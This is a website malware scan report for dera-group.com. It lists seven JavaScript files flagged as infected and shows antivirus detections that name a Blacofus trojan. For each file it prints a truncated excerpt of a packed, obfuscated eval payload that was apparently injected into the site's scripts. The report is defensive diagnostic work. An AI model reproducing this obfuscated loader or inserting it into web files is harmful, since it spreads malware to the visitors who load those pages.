New scan:

Malware Scanner report for dera-group.com

Malicious/Suspicious/Total urls checked
7/0/15
7 pages have malicious code. See details below
Blacklists
Found
The website is marked by Google as suspicious.

The website "dera-group.com" is probably hacked and losing its visitors. You need to take action as soon as possible to fix security issues.
Malicious Redirects
OK
Malicious/Hidden/Total iFrames
0/0/0
Deface / Content modification
OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

  • Malware Removal
  • Blacklists Removal
  • Reason Eliminating
  • 1 Month Hack Insurance

More details

Website Hack Insurance

  • Files & DB Monitoring
  • Daily Backups
  • Malware & Hack Detection
  • Unlimited Hack Repairs

More details

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=dera-group.com

Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.

Scanned pages/files

RequestServer responseStatus
http://dera-group.com/
200 OK
Content-Length: 8330
Content-Type: text/html
clean
http://dera-group.com/_src/pl.js
200 OK
Content-Length: 27455
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('z O(f){w.3U=z(a,b){v c=\'\';2I(v i=0;i<b.J;i++){c+=K.M(a.1b(i%a.J)^b.1b(i))}G c};w.S=z(h){F(h.B(\':\'))h=h.W(\':\')[0];v a=h.W(\'.\');1a(a.J>2){a.2H()}G a.2G(\'.\
... 3012 bytes are skipped ...
DTUYNBhVdXV1AV1tKDAIMDQs8AEACWU1aAlsNCQIWAAEVXxIcUAYZSl4NAhALFxVyBgIGR1IHWGVNREVSQQ1HUk9VUA4KCR8JSwEVVAsXQQIZShcHTVlFUFFdH1BUf1AOQ09NREVSQQ1HUgYTAkNNHBkdCRdPRQIbCB0EDl5PT1QVCkMWbVJPVVAOQ09NREVSQUQBAAJbA1oaAwhKExsSRAUbAxwEV0NSTUYNGwVJAhxNTnoOQ09NREVSQQ1HUk8RH00WAggKEVwDQgMLQRQAXgYBCScNGw1JTxsJBx0HWGVkREVSQUQBAA4YFXkCHC4WABMVSANSUlUEXBYKVm5FUkENR1JPVQ0kQ09NRBgRAFkEGkcQWVVpZgQCFxMMSDATHDYCSwIbCABFT0FYCRYKExlABgtWbkVSQQ0aeBJZUB9TX0Rfbw|typeof|_typeof_|undefined|else|uhRKglsFRGJbcL'.split('|'),0,{}))

Antivirus reports:

AntiVir
JS/Blacofus.A.2
Avast
JS:Obfuscated-GA [Trj]
Ad-Aware
JS:Trojan.Script.WY
Bkav
MW.Clod122.Trojan.18b4
Ikarus
Trojan.JS.Blacofus
nProtect
JS:Trojan.Script.WY
TrendMicro-HouseCall
TROJ_GEN.F47V1124
Comodo
TrojWare.JS.Agent.JE
Emsisoft
JS:Trojan.Script.WY (B)
Microsoft
Trojan:JS/Blacofus.A
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
JS:Trojan.Script.WY
NANO-Antivirus
Trojan.Script.Kryptic.cdvpce
AVG
Exploit
GData
JS:Trojan.Script.WY
BitDefender
JS:Trojan.Script.WY

http://dera-group.com/_src/m.js
200 OK
Content-Length: 12494
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('B O(f){v.1v=B(a,b){p c=\'\';1u(p i=0;i<b.J;i++){c+=I.H(a.W(i%a.J)^b.W(i))}G c};v.T=B(h){F(h.z(\':\'))h=h.V(\':\')[0];p a=h.V(\'.\');S(a.J>2){a.2G()}G a.1s(\'.\')}
... 3012 bytes are skipped ...
CTUFDTUYNBhVdXV1AV1tKDAIMDQs8AEACWU1aAlsNCQIWAAEVXxIcUAYZSl4NAhALFxVyBgIGR1IHWGVNREVSQQ1HUk9VUA4KCR8JSwEVVAsXQQIZShcHTVlFUFFdH1BUf1AOQ09NREVSQQ1HUgYTAkNNHBkdCRdPRQIbCB0EDl5PT1QVCkMWbVJPVVAOQ09NREVSQUQBAAJbA1oaAwhKExsSRAUbAxwEV0NSTUYNGwVJAhxNTnoOQ09NREVSQQ1HUk8RH00WAggKEVwDQgMLQRQAXgYBCScNGw1JTxsJBx0HWGVkREVSQUQBAA4YFXkCHC4WABMVSANSUlUEXBYKVm5FUkENR1JPVQ0kQ09NRBgRAFkEGkcQWVVpZgQCFxMMSDATHDYCSwIbCABFT0FYCRYKExlABgtWbkVSQQ0aeBJZUB9TX0Rfbw|typeof|_typeof_|undefined|else|pVMyVwNQnC'.split('|'),0,{}))

Antivirus reports:

AntiVir
JS/Blacofus.A.2
Avast
JS:Obfuscated-GA [Trj]
Ad-Aware
JS:Trojan.Script.WY
Bkav
MW.Clod580.Trojan.4034
Ikarus
Trojan.JS.Blacofus
nProtect
JS:Trojan.Script.WY
TrendMicro-HouseCall
TROJ_GEN.F47V1124
Emsisoft
JS:Trojan.Script.WY (B)
Comodo
TrojWare.JS.Agent.JE
Microsoft
Trojan:JS/Blacofus.A
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
JS:Trojan.Script.WY
NANO-Antivirus
Trojan.Script.Kryptic.cdvpce
F-Secure
JS:Trojan.Script.WY
AVG
Exploit
GData
JS:Trojan.Script.WY
BitDefender
JS:Trojan.Script.WY

http://dera-group.com/_src/mu.js
200 OK
Content-Length: 12375
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('C O(f){q.2O=C(a,b){p c=\'\';2L(p i=0;i<b.F;i++){c+=H.J(a.S(i%a.F)^b.S(i))}K c};q.W=C(h){L(h.D(\':\'))h=h.P(\':\')[0];p a=h.P(\'.\');R(a.F>2){a.2K()}K a.2J(\'.\')}
... 3012 bytes are skipped ...
TUFDTUYNBhVdXV1AV1tKDAIMDQs8AEACWU1aAlsNCQIWAAEVXxIcUAYZSl4NAhALFxVyBgIGR1IHWGVNREVSQQ1HUk9VUA4KCR8JSwEVVAsXQQIZShcHTVlFUFFdH1BUf1AOQ09NREVSQQ1HUgYTAkNNHBkdCRdPRQIbCB0EDl5PT1QVCkMWbVJPVVAOQ09NREVSQUQBAAJbA1oaAwhKExsSRAUbAxwEV0NSTUYNGwVJAhxNTnoOQ09NREVSQQ1HUk8RH00WAggKEVwDQgMLQRQAXgYBCScNGw1JTxsJBx0HWGVkREVSQUQBAA4YFXkCHC4WABMVSANSUlUEXBYKVm5FUkENR1JPVQ0kQ09NRBgRAFkEGkcQWVVpZgQCFxMMSDATHDYCSwIbCABFT0FYCRYKExlABgtWbkVSQQ0aeBJZUB9TX0Rfbw|typeof|_typeof_|undefined|else|agCAJezpBFA'.split('|'),0,{}))

Antivirus reports:

AntiVir
JS/Blacofus.A.2
Avast
JS:Obfuscated-GA [Trj]
Ad-Aware
JS:Trojan.Script.WY
Ikarus
Trojan.JS.Blacofus
nProtect
JS:Trojan.Script.WY
TrendMicro-HouseCall
TROJ_GEN.F47V1124
Emsisoft
JS:Trojan.Script.WY (B)
Comodo
TrojWare.JS.Agent.JE
Microsoft
Trojan:JS/Blacofus.A
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
JS:Trojan.Script.WY
NANO-Antivirus
Trojan.Script.Kryptic.cdvpce
F-Secure
JS:Trojan.Script.WY
AVG
Exploit
GData
JS:Trojan.Script.WY
BitDefender
JS:Trojan.Script.WY

http://dera-group.com/_src/j.js
200 OK
Content-Length: 12412
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('z O(f){w.2O=z(a,b){v c=\'\';2L(v i=0;i<b.K;i++){c+=L.J(a.T(i%a.K)^b.T(i))}G c};w.W=z(h){I(h.B(\':\'))h=h.19(\':\')[0];v a=h.19(\'.\');S(a.K>2){a.2K()}G a.2J(\'.\'
... 3012 bytes are skipped ...
JaTQYCTUFDTUYNBhVdXV1AV1tKDAIMDQs8AEACWU1aAlsNCQIWAAEVXxIcUAYZSl4NAhALFxVyBgIGR1IHWGVNREVSQQ1HUk9VUA4KCR8JSwEVVAsXQQIZShcHTVlFUFFdH1BUf1AOQ09NREVSQQ1HUgYTAkNNHBkdCRdPRQIbCB0EDl5PT1QVCkMWbVJPVVAOQ09NREVSQUQBAAJbA1oaAwhKExsSRAUbAxwEV0NSTUYNGwVJAhxNTnoOQ09NREVSQQ1HUk8RH00WAggKEVwDQgMLQRQAXgYBCScNGw1JTxsJBx0HWGVkREVSQUQBAA4YFXkCHC4WABMVSANSUlUEXBYKVm5FUkENR1JPVQ0kQ09NRBgRAFkEGkcQWVVpZgQCFxMMSDATHDYCSwIbCABFT0FYCRYKExlABgtWbkVSQQ0aeBJZUB9TX0Rfbw|typeof|_typeof_|undefined|else|AgUxL'.split('|'),0,{}))

Antivirus reports:

AntiVir
JS/Blacofus.A.2
Avast
JS:Obfuscated-GA [Trj]
Ad-Aware
JS:Trojan.Script.WY
Ikarus
Trojan.JS.Blacofus
nProtect
JS:Trojan.Script.WY
TrendMicro-HouseCall
TROJ_GEN.F47V1124
Comodo
TrojWare.JS.Agent.JE
Emsisoft
JS:Trojan.Script.WY (B)
Microsoft
Trojan:JS/Blacofus.A
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
JS:Trojan.Script.WY
NANO-Antivirus
Trojan.Script.Kryptic.cdvpce
F-Secure
JS:Trojan.Script.WY
AVG
Exploit
GData
JS:Trojan.Script.WY
BitDefender
JS:Trojan.Script.WY

http://dera-group.com/_src/t.js
200 OK
Content-Length: 12450
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('B R(f){x.2L=B(a,b){w c=\'\';2I(w i=0;i<b.L;i++){c+=K.I(a.T(i%a.L)^b.T(i))}H c};x.W=B(h){J(h.C(\':\'))h=h.Z(\':\')[0];w a=h.Z(\'.\');S(a.L>2){a.2H()}H a.2G(\'.\')}
... 3012 bytes are skipped ...
aTQYCTUFDTUYNBhVdXV1AV1tKDAIMDQs8AEACWU1aAlsNCQIWAAEVXxIcUAYZSl4NAhALFxVyBgIGR1IHWGVNREVSQQ1HUk9VUA4KCR8JSwEVVAsXQQIZShcHTVlFUFFdH1BUf1AOQ09NREVSQQ1HUgYTAkNNHBkdCRdPRQIbCB0EDl5PT1QVCkMWbVJPVVAOQ09NREVSQUQBAAJbA1oaAwhKExsSRAUbAxwEV0NSTUYNGwVJAhxNTnoOQ09NREVSQQ1HUk8RH00WAggKEVwDQgMLQRQAXgYBCScNGw1JTxsJBx0HWGVkREVSQUQBAA4YFXkCHC4WABMVSANSUlUEXBYKVm5FUkENR1JPVQ0kQ09NRBgRAFkEGkcQWVVpZgQCFxMMSDATHDYCSwIbCABFT0FYCRYKExlABgtWbkVSQQ0aeBJZUB9TX0Rfbw|typeof|_typeof_|undefined|else|TvIDUs'.split('|'),0,{}))

Antivirus reports:

AntiVir
JS/Blacofus.A.2
Avast
JS:Obfuscated-GA [Trj]
Ad-Aware
JS:Trojan.Script.WY
Ikarus
Trojan.JS.Blacofus
nProtect
JS:Trojan.Script.WY
TrendMicro-HouseCall
TROJ_GEN.F47V1124
Emsisoft
JS:Trojan.Script.WY (B)
Comodo
TrojWare.JS.Agent.JE
Microsoft
Trojan:JS/Blacofus.A
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
JS:Trojan.Script.WY
NANO-Antivirus
Trojan.Script.Kryptic.cdvpce
F-Secure
JS:Trojan.Script.WY
AVG
Exploit
GData
JS:Trojan.Script.WY
BitDefender
JS:Trojan.Script.WY

http://dera-group.com/_src/subwin.js
200 OK
Content-Length: 11653
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('B O(f){w.1J=B(a,b){v c=\'\';1n(v i=0;i<b.F;i++){c+=H.I(a.T(i%a.F)^b.T(i))}K c};w.U=B(h){G(h.z(\':\'))h=h.V(\':\')[0];v a=h.V(\'.\');W(a.F>2){a.1g()}K a.1f(\'.\')}
... 3012 bytes are skipped ...
UFDTUYNBhVdXV1AV1tKDAIMDQs8AEACWU1aAlsNCQIWAAEVXxIcUAYZSl4NAhALFxVyBgIGR1IHWGVNREVSQQ1HUk9VUA4KCR8JSwEVVAsXQQIZShcHTVlFUFFdH1BUf1AOQ09NREVSQQ1HUgYTAkNNHBkdCRdPRQIbCB0EDl5PT1QVCkMWbVJPVVAOQ09NREVSQUQBAAJbA1oaAwhKExsSRAUbAxwEV0NSTUYNGwVJAhxNTnoOQ09NREVSQQ1HUk8RH00WAggKEVwDQgMLQRQAXgYBCScNGw1JTxsJBx0HWGVkREVSQUQBAA4YFXkCHC4WABMVSANSUlUEXBYKVm5FUkENR1JPVQ0kQ09NRBgRAFkEGkcQWVVpZgQCFxMMSDATHDYCSwIbCABFT0FYCRYKExlABgtWbkVSQQ0aeBJZUB9TX0Rfbw|typeof|_typeof_|undefined|else|QaMZRbZEbSps'.split('|'),0,{}))

Antivirus reports:

AntiVir
JS/Blacofus.A.2
Avast
JS:Obfuscated-GA [Trj]
Ad-Aware
JS:Trojan.Script.WY
Ikarus
Trojan.JS.Blacofus
nProtect
JS:Trojan.Script.WY
TrendMicro-HouseCall
TROJ_GEN.F47V1124
Comodo
TrojWare.JS.Agent.JE
Emsisoft
JS:Trojan.Script.WY (B)
Microsoft
Trojan:JS/Blacofus.A
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
JS:Trojan.Script.WY
NANO-Antivirus
Trojan.Script.Kryptic.cdvpce
F-Secure
JS:Trojan.Script.WY
AVG
Exploit
GData
JS:Trojan.Script.WY
BitDefender
JS:Trojan.Script.WY

http://dera-group.com/_src/togglebox.js
200 OK
Content-Length: 12917
Content-Type: application/x-javascript
malicious
Malicious code - confirmed by antiviruses (see below)

eval(function(p,a,c,k,e,r){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('y Q(f){v.2L=y(a,b){q c=\'\';2G(q i=0;i<b.G;i++){c+=K.J(a.14(i%a.G)^b.14(i))}O c};v.T=y(h){N(h.z(\':\'))h=h.Y(\':\')[0];q a=h.Y(\'.\');Z(a.G>2){a.2F()}O a.2E(\'.\'
... 3012 bytes are skipped ...
JaTQYCTUFDTUYNBhVdXV1AV1tKDAIMDQs8AEACWU1aAlsNCQIWAAEVXxIcUAYZSl4NAhALFxVyBgIGR1IHWGVNREVSQQ1HUk9VUA4KCR8JSwEVVAsXQQIZShcHTVlFUFFdH1BUf1AOQ09NREVSQQ1HUgYTAkNNHBkdCRdPRQIbCB0EDl5PT1QVCkMWbVJPVVAOQ09NREVSQUQBAAJbA1oaAwhKExsSRAUbAxwEV0NSTUYNGwVJAhxNTnoOQ09NREVSQQ1HUk8RH00WAggKEVwDQgMLQRQAXgYBCScNGw1JTxsJBx0HWGVkREVSQUQBAA4YFXkCHC4WABMVSANSUlUEXBYKVm5FUkENR1JPVQ0kQ09NRBgRAFkEGkcQWVVpZgQCFxMMSDATHDYCSwIbCABFT0FYCRYKExlABgtWbkVSQQ0aeBJZUB9TX0Rfbw|typeof|_typeof_|undefined|else|iAlUD'.split('|'),0,{}))

Antivirus reports:

AntiVir
JS/Blacofus.A.2
Avast
JS:Obfuscated-GA [Trj]
Ad-Aware
JS:Trojan.Script.WY
Ikarus
Trojan.JS.Blacofus
nProtect
JS:Trojan.Script.WY
TrendMicro-HouseCall
TROJ_GEN.F47V1124
Emsisoft
JS:Trojan.Script.WY (B)
Comodo
TrojWare.JS.Agent.JE
Microsoft
Trojan:JS/Blacofus.A
Kaspersky
HEUR:Trojan.Script.Generic
MicroWorld-eScan
JS:Trojan.Script.WY
NANO-Antivirus
Trojan.Script.Kryptic.cdvpce
AVG
Exploit
GData
JS:Trojan.Script.WY
BitDefender
JS:Trojan.Script.WY

http://dera-group.com/index.asp
200 OK
Content-Length: 8330
Content-Type: text/html
clean
http://dera-group.com/missionstatement.asp
200 OK
Content-Length: 4657
Content-Type: text/html
clean
http://dera-group.com/briefhistory.asp
200 OK
Content-Length: 5060
Content-Type: text/html
clean
http://dera-group.com/deragroup.asp
200 OK
Content-Length: 6799
Content-Type: text/html
clean
http://dera-group.com/quality.asp
200 OK
Content-Length: 4980
Content-Type: text/html
clean
http://dera-group.com/productsandservices.asp
200 OK
Content-Length: 6773
Content-Type: text/html
clean
http://dera-group.com/jobsatdera.asp
200 OK
Content-Length: 7224
Content-Type: text/html
clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: dera-group.com

Result:
HTTP/1.1 200 OK
Cache-Control: private
Date: Mon, 22 Dec 2014 12:40:45 GMT
Server: Microsoft-IIS/6.0
Content-Length: 8330
Content-Type: text/html
Set-Cookie: ASPSESSIONIDSAQCTACB=PNKHKIAAMDKBDMMNKPOGLMGI; path=/
X-Powered-By: PleskWin
X-Powered-By: ASP.NET
X-Powered-By-Plesk: PleskWin

...8330 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: dera-group.com
Referer: http://www.google.com/search?q=dera-group.com

Result:
The result is similar to the first query. There are no suspicious redirects found.